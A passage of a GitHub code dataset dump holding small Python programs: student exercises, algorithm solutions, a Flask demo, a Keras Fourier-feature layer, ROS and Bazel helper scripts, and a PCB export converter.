\"\\\"\")\n\n return finalPath\n\n\ndef LoadRandomState(stateNum):\n \"\"\"\n Loads a previous random state from the saved_models directory\n \"\"\"\n print(\"Loading random state\")\n\n filename = 'rngState_' + str(stateNum) + '.pth'\n\n try:\n randomStates = pickle.load( open(GetModelPath() + filename, \"rb\") )\n\n random.setstate(randomStates[\"pythonRandom\"])\n torch.set_rng_state(randomStates[\"torchRandom\"])\n torch.cuda.set_rng_state(randomStates[\"torchCudaRandom\"])\n np.random.set_state(randomStates[\"numpyRandom\"])\n\n except:\n print(\"ERROR: Failed to load random state!\")\n\n\ndef SaveRandomState(stateNum):\n \"\"\"\n Save a random state checkpoint\n \"\"\"\n randomStates = {\n \"pythonRandom\" : random.getstate(), \n \"torchRandom\" : torch.get_rng_state(),\n \"torchCudaRandom\" : torch.cuda.get_rng_state(),\n \"numpyRandom\" : np.random.get_state()\n }\n\n filename = 'rngState_' + str(stateNum) + '.pth'\n\n savePath = GetModelPath() + filename\n\n pickle.dump(randomStates, open(savePath, \"wb\"))\n\n\ndef LoadTrainingTime(stateNum):\n \"\"\"\n Load the number of seconds spent training\n \"\"\"\n\n filename = 'time_' + str(stateNum) + '.pth'\n\n try:\n timeVals = pickle.load( open(GetModelPath() + filename, \"rb\"))\n return timeVals[\"trainingTime\"]\n\n except:\n print(\"ERROR: Failed to load training times! Returning 0\")\n return 0\n\n\ndef SaveTrainingTime(stateNum, seconds):\n \"\"\"\n Save the number of seconds spent training\n \"\"\"\n times = {\n \"trainingTime\" : seconds\n }\n\n filename = 'time_' + str(stateNum) + '.pth'\n savePath = GetModelPath() + filename\n\n pickle.dump(times, open(savePath, \"wb\"))","repo_name":"b1skit/PyTorch-GAN","sub_path":"implementation/srgan/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9883727980","text":"#Assignment 3, Question 2\r\n#Author: Sabir Buxsoo\r\n#Class: CSC1015F 2014\r\n#Date Created: 27/03/2014\r\n\r\n#This program is used to create a triangular shape based on the user input for the height of the triangle.\r\n\r\n#Defining the function triangle() to create the pattern.\r\ndef triangle():\r\n #Pre-condition: Input height of the Triangle.\r\n #Post-condition: Generate triangular pattern.\r\n heightOfTriangle = eval(input(\"Enter the height of the triangle:\\n\"))\r\n spaceAlignment = heightOfTriangle - 1 #Initializing the spacing for the first row.\r\n starAlignment = 1 #Initializing the number of * for the first row == 1.\r\n \r\n #Pre-condition: Make first row with spacing equal to number of rows - 1, followed by 1 star and again folllowed by the same spacing.\r\n #Post-condition: Iterate through heightOfTriangle for each row, decreasing the spacing by subtracting 1 for each row and increasing the number of stars by adding 2 for each row.\r\n for i in range(heightOfTriangle):\r\n print((\" \" * spaceAlignment) + (\"*\" * starAlignment) + (\" \" * spaceAlignment))\r\n spaceAlignment -= 1 #Space should decrease by 1.\r\n starAlignment += 2 #Number of stars should increase by 2.\r\n\r\ntriangle()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/bxsmuh001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41973044792","text":"# Removes the first letter of a given word and adds it to the end of the word with 'ay' at the end.\n\npyg = 'ay'\n\noriginal = input('Enter a word:')\n\nif len(original) > 0 and original.isalpha():\n word = original.lower()\n first = word[0]\n new_word = word + first + pyg\n new_word = new_word[1:len(new_word)]\n print (new_word)\nelse:\n print ('empty')","repo_name":"afam-io/py_learnings","sub_path":"codeacademy/basics/pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38286297482","text":"import copy\n#自定义的deepcopy函数\ndef deepcopy(data):\n #新建的列表\n listdata = []\n if len(data)!=1:\n for i in data:\n #如果i是dict类型的数据,则调用字典处理函数copydict()\n if isinstance(i,dict):\n dictdata = copydict(i)\n listdata.append(dictdata)\n #如果是元组和列表则递归调用deepcopy()函数\n elif isinstance(i,list) or isinstance(i,tuple):\n listdata1 = deepcopy(i)\n listdata.append(listdata1)\n #其他不可变类型的数据就添加到列表listdata中\n else:\n listdata.append(i)\n else:\n return data\n return listdata\n\n#字典类型的处理函数\ndef copydict(data): \n dict1 = {}\n #遍历字典\n for keys,values in data.items():\n #以下的每一步的含义与deepcopy中的相似\n if isinstance(values,dict):\n numdict=copydict(values)\n dict1[keys]=numdict\n else:\n value = deepcopy(values)\n dict1[keys]=value\n return dict1\nif __name__ == '__main__':\n print({'123':123})","repo_name":"yintiannong/98kar","sub_path":"part1/crazy.py","file_name":"crazy.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3586056061","text":"# 2023/03/01 Baek 4659\n\nmoum = [\"a\", \"e\", \"i\", \"o\", \"u\"]\ndef check_pwd(candidate_pwd):\n moum_cnt = 0\n before = \"\"\n before_moum = 0\n before_jaum = 0\n\n for i in candidate_pwd:\n if i in moum:\n moum_cnt += 1\n before_moum += 1\n before_jaum = 0\n else:\n before_moum = 0\n before_jaum += 1\n\n if before_moum >= 3 or before_jaum >= 3:\n return False\n\n if before != i:\n before = i\n else:\n if before not in [\"e\", \"o\"]:\n return False\n \n if moum_cnt == 0:\n return False\n\n return True\n \n\nwhile True:\n candidate_pwd = input()\n if candidate_pwd == \"end\":\n break\n if check_pwd(candidate_pwd):\n print(\"<{}> is acceptable.\".format(candidate_pwd))\n else:\n print(\"<{}> is not acceptable.\".format(candidate_pwd))","repo_name":"kkw2758/Algorithm","sub_path":"구현/baek_4659.py","file_name":"baek_4659.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72704483639","text":"# class for tf.keras Fourier features layer\nimport tensorflow as tf\n\nclass ffLayer(tf.keras.layers.Layer):\n \"\"\"\n Tensorflow keras Layer for Fourier feature extraction\n\n Attributes\n ----------\n input_dim : int, default 10\n Number of input dimensions of the input.\n m : int, default 100\n Number of desired samples per feature (?).\n sig : array_like, optional\n Array of standard deviations for each matrix.\n B_matrices : array_like\n Array of the randomly sampled values for the feature extraction\n layer. Its shape is `(input_dim, m*len(sig))`.\n Each submatrix of shape `(input_dim, m)` has values taken from\n a zero-mean Gaussian distribution with standard deviation of the\n corresponding `sig`.\n\n Notes\n ---------\n Only has non-trainable parameters. The matrices are taken by\n considering `m` samples of a zero-mean Gaussian with standard\n deviations taken by `sig`.\n \"\"\"\n\n def __init__(self, input_dim=10, m=100, sig=None, B_matrices=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n input_dim : int, default 10\n Number of input dimensions of the input.\n m : int, default 100\n Number of desired samples per feature (?).\n sig : array_like, optional\n Array of standard deviations for each matrix.\n B_matrices : array_like\n Array of the randomly sampled values for the feature extraction\n layer. Its shape is `(input_dim, m*len(sig))`.\n Each submatrix of shape `(input_dim, m)` has values taken from\n a zero-mean Gaussian distribution with standard deviation of the\n corresponding `sig`.\n \"\"\"\n super(ffLayer, self).__init__(**kwargs)\n self.input_dim = input_dim\n self.m = m\n if sig is None:\n self.sig = [1, 10, 20, 50, 100]\n else:\n self.sig = sig\n if B_matrices is None:\n self.B_matrices = []\n tf_rng = tf.random.Generator.from_non_deterministic_state()\n for sigi in self.sig:\n self.B_matrices.append(tf_rng.normal(shape=(self.input_dim, self.m),\n mean=0.0, stddev=sigi))\n self.B_matrices = tf.constant(tf.concat(self.B_matrices, 1))\n else:\n self.B_matrices = tf.constant(B_matrices)\n print(\"\", end=\"\")\n\n def call(self, inputs, *args, **kwargs):\n inp_n_rows = tf.shape(inputs)[0]\n inputs_x_B = tf.matmul(inputs, self.B_matrices)\n # return tf.concat([tf.cos(inputs_x_B), tf.sin(inputs_x_B)], 1)\n aux = tf.concat([tf.cos(inputs_x_B), tf.sin(inputs_x_B)], 0)\n return tf.transpose(tf.reshape(tf.transpose(aux), [self.m*len(self.sig)*2, inp_n_rows]))\n\n def get_config(self):\n config = super(ffLayer, self).get_config()\n config.update({\"input_dim\": self.input_dim, \"m\": self.m,\n \"sig\": self.sig, \"B_matrices\": self.B_matrices.numpy()})\n return config\n\n","repo_name":"bva99/PINN-KS","sub_path":"lib/fflayer.py","file_name":"fflayer.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20010588209","text":"from optparse import make_option\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom op_associazione.models import Associate, Membership\n\nclass Command(BaseCommand):\n help = 'Export all subscribers, ever, paying or not'\n\n option_list = BaseCommand.option_list + (\n make_option('--active',\n action='store_true',\n dest='active',\n default=False,\n help='Export only active subscribers'),\n )\n\n def handle(self, *args, **options):\n \"\"\"\n Extracts subscribers in CSV format\n \"\"\"\n\n if options['active']:\n subscribers = [m.associate for m in Membership.objects.filter(is_active=True)]\n else:\n subscribers = Associate.objects.all()\n \n print('nome;cognome;email;location')\n for s in subscribers:\n print(u'%s;%s;%s;%s' % \n (s.first_name, s.last_name, s.email, s.location,)).encode('utf-8')\n \n","repo_name":"openpolis/op_associazione","sub_path":"management/commands/exportsubscribers.py","file_name":"exportsubscribers.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"10587832784","text":"import sys\n\nusage = \"usage: %prog inputfile\"\nversion = '%prog 20170219.1'\n\nfh = open(sys.argv[1])\nfh_out = open(sys.argv[1].split('.')[0] + '_fas.fa', 'w')\n\nfor line in fh:\n\tif line.startswith('bacteria.'):\n\t\tfh_out.write(line.split(':\\t')[1])\n\telse:\n\t\tfh_out.write(line)\n\nfh.close()\nfh_out.close()\n","repo_name":"fanhuan/script","sub_path":"removefilenames.py","file_name":"removefilenames.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"9635513610","text":"# 해당 문제에서 아래와 같은 조건 때문에 뒤로 갈 수 없으므로 visited 리스트는 필요 없다.\n# '구역의 위, 아래, 왼쪽, 오른쪽 중 더 높은 구역으로만 이동할 수 있도록'\n\ndef DFS(x, y):\n global cnt\n if x == max_x and y == max_y:\n cnt += 1\n else:\n for dx, dy in direction:\n nx, ny = x + dx, y + dy\n if 0 <= nx < n and 0 <= ny < n and grid[x][y] < grid[nx][ny]:\n DFS(nx, ny)\n\nif __name__ == '__main__':\n n = int(input())\n grid = [list(map(int, input().split())) for _ in range(n)]\n min_value = 2147000000\n max_value = -2147000000\n for i in range(n):\n for j in range(n):\n if grid[i][j] < min_value:\n min_value = grid[i][j]\n min_x = i\n min_y = j\n if grid[i][j] > max_value:\n max_value = grid[i][j]\n max_x = i\n max_y = j\n cnt = 0\n direction = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n DFS(min_x, min_y)\n print(cnt)","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/basic/section7/등산경로_DFS.py","file_name":"등산경로_DFS.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16188848565","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\n\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch_ros.actions import Node\n\ndef generate_launch_description():\n\n package_name = 'agri_robot_description'\n\n display = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([os.path.join(\n get_package_share_directory(package_name),'launch','display.launch.py'\n )]), launch_arguments={'use_sim_time': 'true'}.items()\n )\n\n gazebo = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([os.path.join(\n get_package_share_directory('gazebo_ros'), 'launch', 'gazebo.launch.py')]),\n )\n \n spawn_entity = Node(package='gazebo_ros', executable='spawn_entity.py',\n arguments=['-topic', 'robot_description',\n '-entity', 'agri_robot'],\n output='screen')\n \n return LaunchDescription([\n display, \n gazebo,\n spawn_entity,\n ])","repo_name":"BrandonAllan/weed_control_robot","sub_path":"agri_robot_description/launch/gazebo.launch.py","file_name":"gazebo.launch.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26722103155","text":"from flask import Flask, abort, render_template, flash, session, redirect, url_for\nimport time\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'djfks'\n\n\"\"\"自定义过滤器\"\"\"\n@app.template_filter('s_time') # 此过滤器的参数为自定义的过滤器的名字。默认为自定义函数名称。\ndef strf_time(timestamp):\n return datetime.fromtimestamp(timestamp)\n# 集中注册过滤器,位置参数1-被装饰的函数,位置参数2-定义过滤器名称\n# app.add_template_filter(strf_time, 's_time')\n\n@app.route('/')\ndef index():\n projects = [\n {\"name\": \"project\", \"interface_num\": 11, \"create_time\": time.time()},\n {\"name\": \"project\", \"interface_num\": 22, \"create_time\": time.time()},\n {\"name\": \"project\", \"interface_num\": 33, \"create_time\": time.time()}\n ]\n\n flash('欢迎来到首页') # 用flash来实现消息闪现,注意必须配置app.config['SECRET_KEY']配置项\n\n # render_template中的**context,上下文管理器。我们可以在后端render_template处添加关键字参数,然后在前端直接获取。\n # 渲染模版时有两种传递参数的方式:用 var='value' 传递一个参数;使用字典组织多个参数,并且加两个**号转换成关键字参数传入。\n return render_template('index.html', **{\"p\": projects,\n \"title\": '模板渲染',\n }) # return render_template('index.html', p = projects, title = '模板渲染')\n\n@app.route('/login/')\ndef login(username):\n session['user'] = username # 使用flask中的session来保存前端传入服务器的数据\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"James-Bond-Liu/Flask_dev","sub_path":"模板引擎/过滤器/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11065802748","text":"def trapping_water_problem(nums): \n if len(nums)<3:\n return 0\n\n left_max=[0 for i in range(len(nums))]\n right_max=[0 for i in range(len(nums))]\n\n for i in range(1,len(nums)):\n left_max[i]=max(left_max[i-1],nums[i-1])\n\n for i in range(len(nums)-2,-1,-1):\n right_max[i]=max(right_max[i+1],nums[i+1])\n\n count=0\n\n for i in range(1,len(nums)-1):\n \n if min(left_max[i],right_max[i])>nums[i]:\n count+=min(left_max[i],right_max[i])-nums[i]\n \n return count\n\n\nprint(trapping_water_problem([0,1,0,2,1,0,1,3,2,1,2,1]))\nprint(trapping_water_problem([4,2,0,3,2,5]))","repo_name":"krishnahansalia/Data-Structure","sub_path":"trapping_water_problem.py","file_name":"trapping_water_problem.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4043272606","text":"# python altium2jlcpcb.py\n\n# instructions:\n# - Use altium outputjob\n# - Copy script into \"project outputs\" folder. Where gerber files are\n# execute py script: \"python altium2jlcpcb.py\" or run altium2pcb.bat in windows\n\n# requisites:\n# pip install pyexcel pyexcel-xlsx\n\n# # Manual work without altium outputjob\n#-(with PCB open) File, fabrication, gerber\n#-(with PCB open) File, fabrication, nc drill\n#-(with PCB open) File, assembly, generates p&p\n\n# automated work:\n# # p&p \n#-remove first lines\n#-change \",\" for ;\n#-change \" for nothing\n#-change , for ;\n#-change TopLayer for Top\n#-change BottomLayer for Bottom\n#-change Center-X(mm) for Mid X\n#-change Center-Y(mm) for Mid Y\n# # bom\n#-change \",\" for ;\n#-change \" for nothing\n#-change LCSC for JLCPCB Part #\n# # save to XLS\n\nfrom zipfile import ZipFile\nimport pandas as pd\nimport glob\nimport os\nimport shutil\n\ncwd = os.getcwd()\n\ndef addtozip(extensionarray):\n for extension in extensionarray:\n print('reading extension: ',extension)\n myextension='*.'+extension\n namearray=glob.glob(myextension)\n for name in namearray:\n zipObj.write(name)\n\n\nprint('running altium2jlcpcb script')\nprint('found files: ')\nprint(glob.glob('*.GBL'))\n\nzipObj = ZipFile('gerber.zip', 'w')\naddtozip([\"GBL\",\"GBO\",\"GBP\",\"GBS\",\"GKO\",\"GTL\",\"GTO\",\"GTP\",\"GTS\"])\n\n\nzipObj.close()\n\n#################################################\n# replace in BOM\n\n# Read in the file\nwith open('BOM.csv', 'r') as file :\n filedata = file.read()\n\n# Replace the target string\n#filedata = filedata.replace('\",\"', ';')\n#filedata = filedata.replace('\"', '')\nfiledata = filedata.replace('LCSC', 'JLCPCB Part #')\n\n# Write the file out again\nwith open('BOM.csv', 'w') as file:\n file.write(filedata)\n\n#################################################\n# replace in PP\n\n# Read in the file\nwith open('PP.csv', 'r') as file :\n filedata = file.read()\n\n# Replace the target string\n#filedata = filedata.replace('\",\"', ';')\n#filedata = filedata.replace('\"', '')\nfiledata = filedata.replace('TopLayer', 'Top')\nfiledata = filedata.replace('BottomLayer', 'Bottom')\nfiledata = filedata.replace('Center-X(mm)', 'Mid X')\nfiledata = filedata.replace('Center-Y(mm)', 'Mid Y')\n\n# Write the file out again\nwith open('PP.csv', 'w') as file:\n file.write(filedata)\n\n\nwith open(\"PP.csv\", \"r+\") as file:\n first_line = file.readline().rstrip()\n\nif first_line==\"Altium Designer Pick and Place Locations\":\n print(\"CAUTION, BAD CSV. Trying to fix\")\n with open(\"PP.csv\", \"r+\") as file:\n all_lines = file.readlines()\n # move file pointer to the beginning of a file\n file.seek(0)\n # truncate the file\n file.truncate()\n # start writing lines except the first line\n file.writelines(all_lines[12:])\nelse:\n\n print(\"CSV is OK. First line: '\",first_line,\"'\")\n\nread_file = pd.read_csv ('BOM.csv')\nread_file.to_excel ('BOM.xlsx', index = None, header=True)\n\n#remove manually first non csv text...\nread_file = pd.read_csv ('PP.csv')\nread_file.to_excel ('PP.xlsx', index = None, header=True)\n\npath = cwd+\"\\export\"\n\nif os.path.isdir('./export'):\n for f in os.listdir(path):\n os.remove(os.path.join(path, f))\n os.rmdir(path)\n\nos.makedirs(path, exist_ok=False)\n\nos.rename(cwd+\"\\gerber.zip\", cwd+\"\\export\\gerber.zip\")\nos.rename(cwd+\"\\BOM.xlsx\", cwd+\"\\export\\BOM.xlsx\")\nos.rename(cwd+\"\\PP.xlsx\", cwd+\"\\export\\PP.xlsx\")","repo_name":"danirebollo/altium2jlcpcb","sub_path":"altium2jlcpcb.py","file_name":"altium2jlcpcb.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"29504227579","text":"def min_steps(src, dest, N):\n\n # we are already at target position\n if src == dest:\n return 0\n\n # initial position co-ordinates\n x1 = src[0]\n y1 = src[1]\n\n # target position co-ordinates\n x2 = dest[0]\n y2 = dest[1]\n\n # all possible moves for knight\n next_moves = [(-2, -1), (-2, 1), (-1, 2), (1, 2),\n (2, 1), (2, -1), (1, -2), (-1, -2)]\n \n # array to keep track of knight, positions left to visit, and distance covered.\n visited = [[0 for j in range(N)] for i in range(N)]\n\n queue = []\n queue.append((x1,y1))\n\n while queue:\n curr = queue.pop(0)\n i = curr[0]\n j = curr[1]\n if i==x2 and j==y2:\n return visited[x2][y2]\n\n\n for k in next_moves:\n if is_valid(i+k[0], j+k[1], visited, N):\n visited[i+k[0]][j+k[1]] = visited[i][j] + 1\n queue.append((i+k[0], j+k[1]))\n return -1\n\n\ndef is_valid(i, j, vis, N):\n return (i >= 0 and i < N and j >= 0 and j < N and vis[i][j] == 0)\n\n\nif __name__ == '__main__':\n N = int(input(\"Enter no. of row in chess board (Counting start from 1) : \"))\n print(\"\\nNOTE :- Enter x,y coordinates as space separated integers on same line.\")\n print(\"\\tFirst cell is (0,0)\", \"Last cell is\",(N-1,N-1) )\n knightpos = tuple(map(int,input(\"\\nEnter Knight's position : \").split()))\n targetpos = tuple(map(int,input(\"Enter target position : \").split()))\n\n print(\"\\nMinimum steps from\",knightpos,\"to\",targetpos,\" = \",min_steps(knightpos, targetpos, N))\n\n\n\n","repo_name":"LunaticPrakash/Data-Structure-And-Algorithms","sub_path":"Python/Graph/Min_Steps_for_dest_for_Knight_Chess.py","file_name":"Min_Steps_for_dest_for_Knight_Chess.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4439205789","text":"from typing import DefaultDict, List, Union\nfrom huggingface_hub import HfApi, list_models\nfrom huggingface_hub.hf_api import ModelInfo\n\ndef list_automodels(task_filter: Union[str,List[str]], hf_token: str = '' ):\n '''These can be run with just the model name and a prompt, no other inputs required.\n All models & tasks publiclly on the Hub (as of October, 2023)\n Total models on Hub = 356,609\n Total models with pipeline tags = 190,650 (53.5%)\n {\n 'text-classification': 33353,\n 'reinforcement-learning': 29993,\n 'text-generation': 26479,\n 'text2text-generation': 18856,\n 'automatic-speech-recognition': 11458,\n 'token-classification': 11213,\n 'text-to-image': 10622,\n 'fill-mask': 8858,\n 'question-answering': 7278,\n 'image-classification': 6008,\n 'feature-extraction': 5706,\n 'audio-to-audio': 3592,\n 'translation': 2896,\n 'conversational': 2498,\n 'sentence-similarity': 2413,\n 'text-to-speech': 1651,\n 'summarization': 1337,\n 'audio-classification': 1320,\n 'object-detection': 897,\n 'unconditional-image-generation': 839,\n 'multiple-choice': 687,\n 'text-to-audio': 385,\n 'video-classification': 329,\n 'image-segmentation': 292,\n 'image-to-text': 283,\n 'tabular-classification': 252,\n 'image-to-image': 203,\n 'zero-shot-image-classification': 202,\n 'zero-shot-classification': 180,\n 'tabular-regression': 167,\n 'visual-question-answering': 82,\n 'table-question-answering': 77,\n 'depth-estimation': 74,\n 'document-question-answering': 70,\n 'text-to-video': 49,\n 'voice-activity-detection': 17,\n 'other': 12,\n 'graph-ml': 12,\n 'robotics': 9,\n 'time-series-forecasting': 1\n }\n '''\n hf_api = HfApi(\n endpoint=\"https://huggingface.co\", \n token=hf_token, # no token necessary, optionally let the user pass their own token to list private/gated models\n )\n\n\n for m in hf_api.list_models():\n if m.pipeline_tag: \n\n if task_filter and m.task in task_filter:\n yield m.model_name \n \n \n","repo_name":"KastanDay/llm-server","sub_path":"utils/list_models.py","file_name":"list_models.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34745054985","text":"\nclass Agent():\n \n # Defined States in the Mission State Machine\n def __init__(self,agentId, agentPos, agentHeading, taskID, taskStatus, agentBattery, agentPayload):\n \"\"\"\n ===========================================================\n Constructor to create initial relevant Objects and global \n Variables of Agent instance\n ===========================================================\n :Parameters: None\n The Agents object is represented by a set of parameters:\n - AgentID (uint32)\n - AgentPosition ([3] List of float64)\n - AgentVelocity ([3] List of float64)\n - AgentHeading (float64)\n - AgentBattery (float64)\n - AgentPayload (bool)\n :return: None\n ===========================================================\n \"\"\" \n self.agentId = agentId\n self.agentPos = agentPos\n self.agentHeading = agentHeading\n self.taskID = taskID\n self.taskStatus = taskStatus\n self.agentBattery = agentBattery\n self.agentPayload = agentPayload\n self.agentWorkingStatus = True\n self.lastReward = 0\n","repo_name":"742785334/mission_planning","sub_path":"scripts/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"10884052965","text":"from odoo import models\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n def shipping_products(self):\n view_id = self.env.ref('prueba_tecnica_oz_solutions.shipping_products_view_form').id\n return {\n 'name': 'Enviar Productos',\n 'type': 'ir.actions.act_window',\n 'res_model': 'shipping.products',\n 'view_mode': 'form',\n 'view_id': view_id,\n 'views': [(view_id, 'form')],\n 'target': 'new',\n 'context': {\n 'default_stock_picking_id': self.id\n }\n }\n","repo_name":"CodigoByte2020/prueba_tecnica_oz_solutions","sub_path":"models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3095472623","text":"#!/usr/bin/env python\n'''\nThis script uses GitHub API to construct http_archive element to be inserted\ninto a federation client projects bazel WORKSPACE\n'''\nimport hashlib\nimport json\nimport urllib3\n\n_HEADERS = {'User-Agent': 'Workspace Updater'}\n\nhttp = urllib3.PoolManager()\n\n\nclass ExternalDependency(object):\n def workspace_rule(self):\n raise NotImplementedError('must implement workspace_rule()')\n\n\nclass GitHubProject(ExternalDependency):\n def __init__(self, name, owner, repo, branch):\n self.name = name\n self.owner = owner\n self.repo = repo\n self.branch = branch\n\n def workspace_rule(self):\n # https://developer.github.com/v3/repos/commits/\n url = f'https://api.github.com/repos/{self.owner}/{self.repo}/commits/{self.branch}'\n request = http.request('GET', url, headers=_HEADERS)\n response = json.loads(request.data.decode('utf-8'))\n commit = response[\"sha\"]\n date = response[\"commit\"][\"committer\"][\"date\"]\n\n url = f'https://github.com/{self.owner}/{self.repo}/archive/{commit}.zip'\n request = http.request('GET', url, headers=_HEADERS)\n sha256 = hashlib.sha256(request.data).hexdigest()\n return f\"\"\"\nhttp_archive(\n name = \"{self.name}\",\n sha256 = \"{sha256}\",\n strip_prefix = \"{self.repo}-{commit}\",\n urls = [\"{url}\"], # {date}\n)\"\"\"\n\n\nPROJECTS = [\n GitHubProject(\n name='com_google_absl_oss_federation',\n owner='abseil',\n repo='federation-head',\n branch='master',\n ),\n GitHubProject(\n name='com_googlesource_code_re2',\n owner='google',\n repo='re2',\n branch='abseil',\n ),\n]\n\nprint(\"********** INSERT THIS INTO YOUR WORKSPACE: *****************\")\nfor project in PROJECTS:\n print(project.workspace_rule())\nprint(\"*********************************\")\n","repo_name":"greasypizza/rgxr","sub_path":"head_sync.py","file_name":"head_sync.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6239832460","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom pi3d.Buffer import Buffer\nfrom pi3d.Shape import Shape\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass Segment(object):\n # use class for tidiness, r,s,t,u are corners of polygon representing a line segment\n r = []\n s = []\n t = []\n u = []\n a = 0.0 # line equation gradient (for calc intersections of corners)\n cr = 0.0 # right side line equation const (i.e. in eq of line y = ax + c)\n cs = 0.0 # left side const\n\nclass PolygonLines(Shape):\n \"\"\" 3d model inherits from Shape\"\"\"\n def __init__(self, camera=None, light=None, vertices=[], material=(1.0,1.0,1.0),\n line_width=1, closed=False, name=\"\", x=0.0, y=0.0, z=0.0,\n sx=1.0, sy=1.0, sz=1.0, rx=0.0, ry=0.0, rz=0.0,\n cx=0.0, cy=0.0, cz=0.0, strip=True):\n \"\"\"uses standard constructor for Shape extra Keyword arguments:\n\n *vertices*\n array of tuples [(x0,y0,z0),(x1,y1,z1)..]\n *material*\n tuple (r,g,b)\n *line_width*\n set to 1 if absent or set to a value less than 1\n *closed*\n joins up last leg i.e. for polygons - only used for strip\n *strip*\n use GL_LINE_STRIP otherwise GL_LINES - needs pairs for line ends\n \"\"\"\n super(PolygonLines, self).__init__(camera, light, name, x, y, z, rx, ry, rz,\n sx, sy, sz, cx, cy, cz)\n\n LOGGER.debug(\"Creating PolygonLines ...\")\n\n segs = []\n hw = line_width * 0.5 # half width\n step = 1 if strip else 2\n n_v = len(vertices) if closed else len(vertices) - 1\n for i in range(0, n_v, step): #TODO non strip version\n i_next = (i + 1) % len(vertices) # i.e. wrap to first if closed\n ((x0, y0, z0), (x1, y1, z1)) = (vertices[i], vertices[i_next])\n (dx, dy) = (x1 - x0, y1 - y0)\n dlen = (dx ** 2 + dy ** 2) ** 0.5\n (dx, dy) = (dx / dlen, dy / dlen) # normalised vec along segment\n seg = Segment() # for convenient notation\n seg.r = [x0 + dy * hw, y0 - dx * hw, z0] # points to either side of line ends\n seg.s = [x0 - dy * hw, y0 + dx * hw, z0]\n seg.t = [x1 + dy * hw, y1 - dx * hw, z1]\n seg.u = [x1 - dy * hw, y1 + dx * hw, z1]\n seg.a = dy / dx if dx != 0 else 1000000.0\n seg.cr = seg.r[1] - seg.r[0] * seg.a\n seg.cs = seg.s[1] - seg.s[0] * seg.a\n segs.append(seg)\n if strip:\n new_verts = [segs[0].r[:], segs[0].s[:]] # first pair vertex\n n_s = len(segs) if closed else len(segs) - 1\n for i in range(n_s): # calculate intersection points for extension\n i_next = (i + 1) % len(segs) # i.e. wrap for closed\n da = segs[i].a - segs[i_next].a\n if abs(da) < 0.0001: # either straight or doubling back\n new_verts.extend([segs[i].t, segs[i].u])\n else:\n dc = segs[i_next].cr - segs[i].cr # far end right\n new_verts.append([dc / da, segs[i].a * dc / da + segs[i].cr, segs[i].t[2]])\n dc = segs[i_next].cs - segs[i].cs # far end left\n new_verts.append([dc / da, segs[i].a * dc / da + segs[i].cs, segs[i].u[2]])\n if not closed:\n new_verts.extend([segs[-1].t, segs[-1].u]) # last pair vertex\n else:\n new_verts[1] = new_verts[-1][:]\n new_verts[0] = new_verts[-2][:]\n n = len(new_verts) - 2\n indices = [[i+u, i+v, i+w] for i in range(0, n, 2)\n for (u, v, w) in [(0, 1, 3), (3, 2, 0)]]\n else: # simpler for non-strip\n new_verts = []\n for seg in segs:\n 